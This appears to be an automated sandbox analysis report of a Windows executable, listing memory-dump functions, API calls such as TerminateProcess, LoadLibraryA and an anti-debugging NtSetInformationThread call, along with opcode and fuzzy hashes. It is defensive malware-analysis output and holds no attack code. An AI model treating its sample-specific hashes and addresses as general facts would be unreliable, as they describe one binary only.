String ID: v:
API String ID: 3349790660-1532531550
Opcode ID: 1f171ffd89cea2bf29240cf09fb691558620e1f3a547616319ac49f89dbb0c67
Instruction ID: bbd79d065e5a3a7a23ede791e29b9d9864e439367e49e3f3eafa017184a74169
Opcode Fuzzy Hash: 1f171ffd89cea2bf29240cf09fb691558620e1f3a547616319ac49f89dbb0c67
Instruction Fuzzy Hash: 6621C13C6C4304EAEE3C092C4CA5BFA22635FB9314F78521DDD77A60D5D738D4818911

Uniqueness

Uniqueness Score: -1.00%

Function 021C0AA2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: v:
API String ID: 560597551-1532531550
Opcode ID: 20a28e6f4a8e5800c0098fd375a58e02398105d5e423be9f364a7b1f3226ddb9
Instruction ID: eb01cd4e114b170b3447ca13f6555f7daa5dfd320c98b22127de19f11ef43e6e
Opcode Fuzzy Hash: 20a28e6f4a8e5800c0098fd375a58e02398105d5e423be9f364a7b1f3226ddb9
Instruction Fuzzy Hash: B7218B3CAC8304EFEE3819288DA5BEA22275FB9324F74821DDD7B670D5D738D5858911

Uniqueness

Uniqueness Score: -1.00%

Function 021C0AED, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: v:
API String ID: 560597551-1532531550
Opcode ID: e6daa8d504655adf9814c83dcc105ff79cde713c300c593a8866494bc61c6960
Instruction ID: ffea6949ac97863f86451de36ee4a611f46eb026cd5bd09e013ac3be4fab4bb5
Opcode Fuzzy Hash: e6daa8d504655adf9814c83dcc105ff79cde713c300c593a8866494bc61c6960
Instruction Fuzzy Hash: 86118C3CAC8304EBEE3859288DA5BEA21135F75324F70420DDD77660D4DB38D5858911

Uniqueness

Uniqueness Score: -1.00%

Function 021C0AF9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID: v:
API String ID: 560597551-1532531550
Opcode ID: f18f6f7e5a82def68dae971eb917a9d76a42333f3b086b151298cd68578d929b
Instruction ID: a87f9ca067ea45b8a2b590d19e6ba7ddbbb41611fa895d065ebfc5c764f17758
Opcode Fuzzy Hash: f18f6f7e5a82def68dae971eb917a9d76a42333f3b086b151298cd68578d929b
Instruction Fuzzy Hash: 5611923C5C8304EBEF3859288D61BEA31535F75324F75420DDD77560D5DB38D5868922

Uniqueness

Uniqueness Score: -1.00%

Function 021C0B18, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Strings

v:, xrefs: 021C0B34

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID: v:
API String ID: 3349790660-1532531550
Opcode ID: 5ce59791d78b503eb09f8f77f2bf12c05b9f3ce5a205b5c2638744fe00b67c37
Instruction ID: c7eeb80f3237c7128464b6da05206cd3ee7802791fc1cc7c1fa2baaee2801b39
Opcode Fuzzy Hash: 5ce59791d78b503eb09f8f77f2bf12c05b9f3ce5a205b5c2638744fe00b67c37
Instruction Fuzzy Hash: D0016D3CAC8305EBEE3459284CA5BD921174F65324F38820DAD7A560D4DB3890868915

Uniqueness

Uniqueness Score: -1.00%

Function 0040145C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401461

Strings

VB5!6&*, xrefs: 0040145C

Memory Dump Source

Source File: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 902453c88adf22a9930f1f3748bbfadd84e9de056cdea1beb8f1452d24c445bc
Instruction ID: 4e41c34447bcc37c8a33a8e0fee8ad50e4e91a5cbd51b2c28c6a5ec9ba10e7a3
Opcode Fuzzy Hash: 902453c88adf22a9930f1f3748bbfadd84e9de056cdea1beb8f1452d24c445bc
Instruction Fuzzy Hash: B9E0F71048F3D92EC30363B6282AAAABFB00D0321431F80EB85C5EF1E3D0180898C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 021C2933, Relevance: 1.7, APIs: 1, Instructions: 219libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a9f3e9af9b7790871ad9d1742d1b206974550b68a34f97b751192256de0eb56e
Instruction ID: 0a767061f00b5863e285b7fd73b43adab682d21f91ca3d161517dd9de0beac02
Opcode Fuzzy Hash: a9f3e9af9b7790871ad9d1742d1b206974550b68a34f97b751192256de0eb56e
Instruction Fuzzy Hash: 1861AD6D4CC3D59FC72E9A700A7E6A5BE616E33254B3DC2DEDCA60B0A3D3248145C683

Uniqueness

Uniqueness Score: -1.00%

Function 021C298B, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 61b0b7874b572a1cd81a89a2f9b8c87aaf3353d5c3abfe957b01c6b9996dae4b
Instruction ID: 765d91cb16a294ad988c61e8f147664008a0728b5a6bf26687ca2134629cd160
Opcode Fuzzy Hash: 61b0b7874b572a1cd81a89a2f9b8c87aaf3353d5c3abfe957b01c6b9996dae4b
Instruction Fuzzy Hash: D411CC5C6CD325E99A2C3A641A34BFA20BA5F33BE0F33422EAC778204897548404C5D3

Uniqueness

Uniqueness Score: -1.00%

Function 021C45AF, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6c557ea923f219dccf5efdd47aa64035f6f499c421c962512b761a681c848628
Instruction ID: 236c70c5d7675b64650d379e7e72f956e0cd704e9ecaae98bfd46dd94cc8f5e7
Opcode Fuzzy Hash: 6c557ea923f219dccf5efdd47aa64035f6f499c421c962512b761a681c848628
Instruction Fuzzy Hash: 73019A5C6CD325EDA62C3A601E34BBA10B65F33BE0F37422EAC768204897548414C5D3

Uniqueness

Uniqueness Score: -1.00%

Function 021C45CC, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c8b2e2bba0ddf237c2c5f895a940cfad16c204485e024163b8bfd2f2096fcee5
Instruction ID: c3efc14fb90725a408eb1bc776ceaa2dbceaec95947c491c60cbbbf6baca0208
Opcode Fuzzy Hash: c8b2e2bba0ddf237c2c5f895a940cfad16c204485e024163b8bfd2f2096fcee5
Instruction Fuzzy Hash: 86019A1C6CD365EDE62C3A601A34BF915B61F33BE0F7B523EAC768204997588804C9C3

Uniqueness

Uniqueness Score: -1.00%

Function 021C45DD, Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 407cd8c7e7e794d883287ba684d697cbc9243ddbceca00c2062856321de99fce
Instruction ID: e1c251259f4dc568c82a9697b4a677989efad635682814bc77620d02d896638b
Opcode Fuzzy Hash: 407cd8c7e7e794d883287ba684d697cbc9243ddbceca00c2062856321de99fce
Instruction Fuzzy Hash: FB019A5C2CD365EDA62C3A645E74BB915B20F33BD0F3B423EAC768204897588804C9C7

Uniqueness

Uniqueness Score: -1.00%

Function 021C45FC, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e41f37c9aa4c8c1600f71558247de71f03742506aeaa60542dde8f91a53b550
Instruction ID: 39789f87460ab9f885a1a4b6df5b1770c780856578e4256a4d7524b88a9bf338
Opcode Fuzzy Hash: 6e41f37c9aa4c8c1600f71558247de71f03742506aeaa60542dde8f91a53b550
Instruction Fuzzy Hash: 8F018F1C2CD365EDA61C3A645A34BF915B61F33B90F7B513EAC768204997548414C9C7

Uniqueness

Uniqueness Score: -1.00%

Function 021C4626, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0eee953dd07d5292bd1439c3c614f1869b65c5498532680fd3780b2f8ec232b3
Instruction ID: 62ef6c1c2b3b643a1cad416b28d543e1fa70008946bb0d648026e3074e20fa18
Opcode Fuzzy Hash: 0eee953dd07d5292bd1439c3c614f1869b65c5498532680fd3780b2f8ec232b3
Instruction Fuzzy Hash: EE018F1C6CD325EDE61D36A45A787BD56B61F33790F7B453EAC6683049D7148804C9C2

Uniqueness

Uniqueness Score: -1.00%

Function 021C4651, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b48b009d6b6f4597d25ee29b969ecbd75cb925d87091c5c294606bb79e7a7ca2
Instruction ID: 12f436fe6e3e7eb95dcec3d6661ef121333a02bad74cc1b6c27edc8d5b00f82e
Opcode Fuzzy Hash: b48b009d6b6f4597d25ee29b969ecbd75cb925d87091c5c294606bb79e7a7ca2
Instruction Fuzzy Hash: F601DF1C2CD325EDE62C3A640A78BB915B31F33790F3B853EAC7682008E7148804C5C2

Uniqueness

Uniqueness Score: -1.00%

Function 021C0B4D, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 0d4c373161332a0acf15b6c008068d6a69243b5a18a405c9924928a8e93d4f04
Instruction ID: f8a8f1d7a430ed9fe1ce9143ad10ada82478e969b73c9204ac28902d72334fc1
Opcode Fuzzy Hash: 0d4c373161332a0acf15b6c008068d6a69243b5a18a405c9924928a8e93d4f04
Instruction Fuzzy Hash: 37F0AC3C8C8340EBEE3458284D65BD621174B36338F34C30DDCBA520C5D7389085CD12

Uniqueness

Uniqueness Score: -1.00%

Function 021C4664, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cb0597b7f8a085f79869995a90a9b48c6a8a556c8a70ade04d1a3d307a781b44
Instruction ID: 69ee9c3302927f9f0590cb70ae6ca3d16c940c5cae97e6b203712ad1ef71c290
Opcode Fuzzy Hash: cb0597b7f8a085f79869995a90a9b48c6a8a556c8a70ade04d1a3d307a781b44
Instruction Fuzzy Hash: 23F0901C2CD325EE961D3A601E34BF916B71F33B90F7B513EAC768214497548804C9C6

Uniqueness

Uniqueness Score: -1.00%

Function 021C0B60, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 9c2d8e9b438cb52cd319f3f94f59dbcfc4b397015402e9f9d900bb4ac0b3e518
Instruction ID: a839e72423b10af2feb5cc60d661d0a42bc1cc7f36fc54e22b7ae6e969711645
Opcode Fuzzy Hash: 9c2d8e9b438cb52cd319f3f94f59dbcfc4b397015402e9f9d900bb4ac0b3e518
Instruction Fuzzy Hash: 30F0AC3C5C8245DBEF38193448A67DA26674F76329F78921CDD7A470D2DB388080CA01

Uniqueness

Uniqueness Score: -1.00%

Function 021C0BDD, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 1518efd3b37852894d2277cb32e794908ddb84ca104e89d1b2bf762f704d4c9f
Instruction ID: 751835035d180b8bdcc4997e724e059e3661208df5f94039653a34f1f9251b46
Opcode Fuzzy Hash: 1518efd3b37852894d2277cb32e794908ddb84ca104e89d1b2bf762f704d4c9f
Instruction Fuzzy Hash: 59F0463C5C8205DAEE3859280DA67EA21678F7A32DF75921DDD7B460D1EB388181CA02

Uniqueness

Uniqueness Score: -1.00%

Function 021C4655, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dcd37a0235f24c3de94b8de7fb9ba0701f2e04357f9dd3403a2a7c288d1469fa
Instruction ID: 0182c4a163ce00f1895f5e7d2a3a9024d140c6aaa21e2df5a4454defa31aae4d
Opcode Fuzzy Hash: dcd37a0235f24c3de94b8de7fb9ba0701f2e04357f9dd3403a2a7c288d1469fa
Instruction Fuzzy Hash: 3AF03A2C2CD325EA962D3AA41E35BF915B61E33B90F77523EAC768214897648414C9C7

Uniqueness

Uniqueness Score: -1.00%

Function 021C4657, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5e52bb123937d66def39c0c7d2491279a977318c5de719791f181b9b4b1f5682
Instruction ID: 2f9666428e0289c84206b67c2f1ed488224c69f21d2a93ee639e3142b75c74c9
Opcode Fuzzy Hash: 5e52bb123937d66def39c0c7d2491279a977318c5de719791f181b9b4b1f5682
Instruction Fuzzy Hash: C1F0BE2C2CD325EE962C3AA01E34BF915B60F33B90F33423EAC768204897548404C9C7

Uniqueness

Uniqueness Score: -1.00%

Function 021C4729, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 38e771ae4b56a03acdd1e46bac67ea5c047603b61e66d26242d1df8421d568a1
Instruction ID: 12aefad4502813a483effa1334eb5329a3627839308fed3f77ac41230b85e89e
Opcode Fuzzy Hash: 38e771ae4b56a03acdd1e46bac67ea5c047603b61e66d26242d1df8421d568a1
Instruction Fuzzy Hash: 46F0822C6CE361EA921E266449787F95BB20E33760B7B817EDC3387552D7588800CAC2

Uniqueness

Uniqueness Score: -1.00%

Function 021C4698, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 85383f61b329065b502465868fbf4f9437360bcb4c13e2f3302b7116657418d5
Instruction ID: 8422dc22d2e0e116c27cf98881cf3a4cdb7e621f91ed5b7fa0426be285612cf3
Opcode Fuzzy Hash: 85383f61b329065b502465868fbf4f9437360bcb4c13e2f3302b7116657418d5
Instruction Fuzzy Hash: 1FF0A71C2CD315DA960D3A605A387F956B31E33B90F3A413DAC3643044D7644404C9C6

Uniqueness

Uniqueness Score: -1.00%

Function 021C46CD, Relevance: 1.5, APIs: 1, Instructions: 32libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b38b57689c261c49aa7eddd39f9ced5e94c18af1f18c08286860e9db13eb22f5
Instruction ID: 12eae9bd3c5945fe9d7b9ced55e5d0c3d2393d9f120e55aa0a1bd488a12e323f
Opcode Fuzzy Hash: b38b57689c261c49aa7eddd39f9ced5e94c18af1f18c08286860e9db13eb22f5
Instruction Fuzzy Hash: 8DE0D82C2CD311DA920D2A641A787FD5AB71E73B50B7B813DEC3783140D7648800C981

Uniqueness

Uniqueness Score: -1.00%

Function 021C46C2, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 160dc12557010884129baab39c484e735a2ab5126e9449a62ec6d1b7b97fea3c
Instruction ID: 08ca81ef9ecf158039ef88e35870a887dd667f3ab907fef0053661003056129a
Opcode Fuzzy Hash: 160dc12557010884129baab39c484e735a2ab5126e9449a62ec6d1b7b97fea3c
Instruction Fuzzy Hash: 67E04F2C2CD320DA811D3AA41A757F966B65E33B90F33913EEC374354497648404CAC2

Uniqueness

Uniqueness Score: -1.00%

Function 021C0B93, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 80dd1665f4e6dfb6922d183b3b0a77ad3c8be755f77bae4bc4fd0240ee6943db
Instruction ID: 794efe96203963e4cb49c0c0221b577c4eb77c8b749f3980999555cfcd8f2bca
Opcode Fuzzy Hash: 80dd1665f4e6dfb6922d183b3b0a77ad3c8be755f77bae4bc4fd0240ee6943db
Instruction Fuzzy Hash: 13F0A03C18D2819FEA3A6A340865BE82E610B26305F794489DCA6970E2CB344489CA26

Uniqueness

Uniqueness Score: -1.00%

Function 021C46F4, Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f0cb69c7afe7f66cf596a059cab0aa91e4a993c90e738b8c53aa4f316e6ecb6
Instruction ID: f9f537c9dcaeb4d2587677dc7f499dca350bf2e44160a6f355d5752a9d0239fd
Opcode Fuzzy Hash: 6f0cb69c7afe7f66cf596a059cab0aa91e4a993c90e738b8c53aa4f316e6ecb6
Instruction Fuzzy Hash: 3FE0DF1C2CD350DAD60E26681A383FDAFB21D67B60B7A807CEC2683001D7688800CE80

Uniqueness

Uniqueness Score: -1.00%

Function 021C0550, Relevance: 1.5, APIs: 1, Instructions: 28nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(021C059D,?,00000000,00000051,?,?,0000FFFF,?,?,00000000,?,?,?,?,?,?), ref: 021C0566
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?), ref: 021C0663

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 1e389699850c594bc1d56a5e8078384d9cd53cd16a011b98c9642664091fa5a0
Instruction ID: 4174dc9ea10bdf674853feb7b5e14d86d1a7aa40831b053ebd65aac7e537df77
Opcode Fuzzy Hash: 1e389699850c594bc1d56a5e8078384d9cd53cd16a011b98c9642664091fa5a0
Instruction Fuzzy Hash: 25E0927D244140EFEA549AB48C54BB93B659B9A320F754548F46AD6191CA218880CA10

Uniqueness

Uniqueness Score: -1.00%

Function 021C4735, Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8d13d7aef5d52a7f3eb853c065fd13661548039ea66b82bcdb211d06f7581a51
Instruction ID: cfe6643a72622251636a5c33b951a08b0d476a4284326842cb28e9e022c98074
Opcode Fuzzy Hash: 8d13d7aef5d52a7f3eb853c065fd13661548039ea66b82bcdb211d06f7581a51
Instruction Fuzzy Hash: E7E0861C2CD310DA950E26681A783FD5B721D77B61B76817DEC3783040D7688800CE91

Uniqueness

Uniqueness Score: -1.00%

Function 021C470D, Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c0fe2a7ed4151879c7dcd8c6a08828e3720f2e7c52879829471ada4a3b45f299
Instruction ID: 151b586df7a1f7e7909d11d9dc931b3f2964ae8a1abc6d8aa11889002a22e945
Opcode Fuzzy Hash: c0fe2a7ed4151879c7dcd8c6a08828e3720f2e7c52879829471ada4a3b45f299
Instruction Fuzzy Hash: ABE08C2C2CC310DA960E2A681A783FD6BB20E67B60B7A817CAC2283140C7688800CA81

Uniqueness

Uniqueness Score: -1.00%

Function 021C4755, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1a9c7c822fc66cdd70c5c409b60a422107396c3e8e2f2965a4cded9c5df6a5a2
Instruction ID: 4f5a30b5a876b6bd66200ebf8207db513cc0824267b578cdc617ba38cb2f7d81
Opcode Fuzzy Hash: 1a9c7c822fc66cdd70c5c409b60a422107396c3e8e2f2965a4cded9c5df6a5a2
Instruction Fuzzy Hash: F1D05B6C2CC311D6410D26941E753FD56B20E37B50F77813DAC3682140C7788800CA91

Uniqueness

Uniqueness Score: -1.00%

Function 021C0BFD, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000ED,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,?), ref: 021C2B0C

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 85f4aa47e6e99f1800f184ab792d9a239611289e7f5c0b1fafab51c571528b54
Instruction ID: a9e3e1f256743a7ac5e9d3d02c09a62e1cc4bb4c8fb30031975fbd3c89a1d50c
Opcode Fuzzy Hash: 85f4aa47e6e99f1800f184ab792d9a239611289e7f5c0b1fafab51c571528b54
Instruction Fuzzy Hash: 82E08C3C08E381CFCB364A204C967683B214F1B618F36018BACB6894E2C728448BC726

Uniqueness

Uniqueness Score: -1.00%

Function 021C4761, Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

